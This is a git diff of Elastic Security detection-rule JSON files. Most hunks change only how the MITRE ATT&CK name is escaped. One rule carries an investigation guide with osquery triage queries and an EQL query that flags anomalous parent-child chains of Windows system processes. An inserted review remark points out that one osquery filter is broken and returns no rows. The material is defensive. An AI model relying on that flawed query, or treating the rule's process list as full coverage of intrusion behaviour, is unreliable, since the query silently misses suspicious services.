Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these characteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the system and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\nprocess.parent.name != null and\n (\n /* suspicious parent processes */\n (process.name:\"autochk.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"fontdrvhost.exe\", \"dwm.exe\") and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:(\"consent.exe\", \"RuntimeBroker.exe\", \"TiWorker.exe\") and not process.parent.name:\"svchost.exe\") or\n (process.name:\"SearchIndexer.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"SearchProtocolHost.exe\" and not process.parent.name:(\"SearchIndexer.exe\", \"dllhost.exe\")) or\n (process.name:\"dllhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"smss.exe\" and not process.parent.name:(\"System\", \"smss.exe\")) or\n (process.name:\"csrss.exe\" and not process.parent.name:(\"smss.exe\", \"svchost.exe\")) or\n (process.name:\"wininit.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:\"winlogon.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"lsass.exe\", \"LsaIso.exe\") and not process.parent.name:\"wininit.exe\") or\n (process.name:\"LogonUI.exe\" and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:\"services.exe\" and not process.parent.name:\"wininit.exe\") or\n (process.name:\"svchost.exe\" and not process.parent.name:(\"MsMpEng.exe\", \"services.exe\")) or\n (process.name:\"spoolsv.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"taskhost.exe\" and not 
process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"taskhostw.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"userinit.exe\" and not process.parent.name:(\"dwm.exe\", \"winlogon.exe\")) or\n (process.name:(\"wmiprvse.exe\", \"wsmprovhost.exe\", \"winrshost.exe\") and not process.parent.name:\"svchost.exe\") or\n /* suspicious child processes */\n (process.parent.name:(\"SearchProtocolHost.exe\", \"taskhost.exe\", \"csrss.exe\") and not process.name:(\"werfault.exe\", \"wermgr.exe\", \"WerFaultSecure.exe\")) or\n (process.parent.name:\"autochk.exe\" and not process.name:(\"chkdsk.exe\", \"doskey.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"smss.exe\" and not process.name:(\"autochk.exe\", \"smss.exe\", \"csrss.exe\", \"wininit.exe\", \"winlogon.exe\", \"setupcl.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"wermgr.exe\" and not process.name:(\"WerFaultSecure.exe\", \"wermgr.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"conhost.exe\" and not process.name:(\"mscorsvw.exe\", \"wermgr.exe\", \"WerFault.exe\", \"WerFaultSecure.exe\"))\n )\n", "references": [ "https://github.com/sbousseaden/Slides/blob/master/Hunting%20MindMaps/PNG/Windows%20Processes%20TH.map.png", 
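Review bot: The "Osquery - Retrieve Services Running on User Accounts" query embedded in the new `note` line filters with `user_account == null`, which in osquery's SQLite dialect evaluates to NULL rather than true; for every service that does not match the three LIKE patterns the predicate `NOT (false OR false OR false OR NULL)` is NULL, so the WHERE clause never holds and the query returns no rows at all. The comparison should be `user_account IS NULL`, which makes the NOT-clause true for services running under other accounts and still excludes the built-in and null accounts as intended. The same query text is carried in the other revisions of this rule in this diff and, since these JSON files look like exported rule artifacts, the fix presumably belongs in the upstream rule source rather than in this export.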
@@ -54,7 +54,7 @@
 ],
 "risk_score": 47,
 "rule_id": "35df0dd8-092d-4a83-88c1-5151a804f31b",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_104.json b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_104.json
index 31a16e44e75..342473202df 100644
--- a/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_104.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_105.json b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_105.json
index ac78117bab0..19b2cbe746b 100644
--- a/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_105.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_106.json b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_106.json
index a46302b0033..34735a73c75 100644
--- a/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_106.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_107.json b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_107.json
index 1b3aec506b0..ec3e351a788 100644
--- a/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_107.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_108.json b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_108.json
index 61d4aeafaf9..9de3d284b5a 100644
--- a/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_108.json
+++ b/packages/security_detection_engine/kibana/security_rule/3688577a-d196-11ec-90b0-f661ea17fbce_108.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_102.json b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_102.json
index 2a3e9b25208..6b2d8ebe43e 100644
--- a/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_102.json
@@ -49,7 +49,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_103.json b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_103.json
index 7fde3151161..cc633d3b324 100644
--- a/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_103.json
@@ -48,7 +48,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_104.json b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_104.json
index b33be5a1579..0be1cd2d7a9 100644
--- a/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_104.json
@@ -49,7 +49,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_105.json b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_105.json
index 30b7c55946a..edcae5e9185 100644
--- a/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/36a8e048-d888-4f61-a8b9-0f9e2e40f317_105.json
@@ -50,7 +50,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -72,7 +72,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/36c48a0c-c63a-4cbc-aee1-8cac87db31a9_1.json b/packages/security_detection_engine/kibana/security_rule/36c48a0c-c63a-4cbc-aee1-8cac87db31a9_1.json
index 91efd0f6f1e..3043fee4a20 100644
--- a/packages/security_detection_engine/kibana/security_rule/36c48a0c-c63a-4cbc-aee1-8cac87db31a9_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/36c48a0c-c63a-4cbc-aee1-8cac87db31a9_1.json
@@ -33,7 +33,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0008",
 "name": "Lateral Movement",
diff --git a/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_1.json b/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_1.json
index 4b1b4fe0a2c..1622dde6673 100644
--- a/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_1.json
@@ -52,7 +52,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -98,7 +98,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_2.json b/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_2.json
index 5d930e26be8..cc49ddeb05f 100644
--- a/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_2.json
@@ -53,7 +53,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -99,7 +99,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_3.json b/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_3.json
index a6c0e50e5b9..e0d007f3ee3 100644
--- a/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/3728c08d-9b70-456b-b6b8-007c7d246128_3.json
@@ -54,7 +54,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -100,7 +100,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_102.json b/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_102.json
index f9e1ec49cd4..d43ac2069f0 100644
--- a/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_102.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_103.json b/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_103.json
index 1cc21dad9c7..2d0523f5b31 100644
--- a/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_103.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_104.json b/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_104.json
index cbcdec2633d..e20d4198868 100644
--- a/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_104.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_205.json b/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_205.json
index 8f5be755ad3..9a3f483a164 100644
--- a/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/378f9024-8a0c-46a5-aa08-ce147ac73a4e_205.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/37994bca-0611-4500-ab67-5588afe73b77_104.json b/packages/security_detection_engine/kibana/security_rule/37994bca-0611-4500-ab67-5588afe73b77_104.json
index 70e5b7a5978..5df5eab805a 100644
--- a/packages/security_detection_engine/kibana/security_rule/37994bca-0611-4500-ab67-5588afe73b77_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/37994bca-0611-4500-ab67-5588afe73b77_104.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/37994bca-0611-4500-ab67-5588afe73b77_105.json b/packages/security_detection_engine/kibana/security_rule/37994bca-0611-4500-ab67-5588afe73b77_105.json
index 8f8396b726a..bad6b5fea3d 100644
--- a/packages/security_detection_engine/kibana/security_rule/37994bca-0611-4500-ab67-5588afe73b77_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/37994bca-0611-4500-ab67-5588afe73b77_105.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_105.json b/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_105.json
index 9e74d6d4bc9..1256774b5df 100644
--- a/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_105.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_106.json b/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_106.json
index 94c8158346d..5afb15531f7 100644
--- a/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_106.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_107.json b/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_107.json
index a63c2c58d85..903ae68290c 100644
--- a/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_107.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_208.json b/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_208.json
index 6604ff9ede2..b594706c2df 100644
--- a/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_208.json
+++ b/packages/security_detection_engine/kibana/security_rule/37b211e8-4e2f-440f-86d8-06cc8f158cfa_208.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0001",
 "name": "Initial Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_102.json b/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_102.json
index 757d7af3337..12baf584e01 100644
--- a/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_102.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_103.json b/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_103.json
index f82a6a6c719..df63a829e73 100644
--- a/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_103.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_104.json b/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_104.json
index 03f38c43348..246d5a2e9c6 100644
--- a/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_104.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_105.json b/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_105.json
index 7377c149f10..b4716646fb8 100644
--- a/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/37f638ea-909d-4f94-9248-edd21e4a9906_105.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
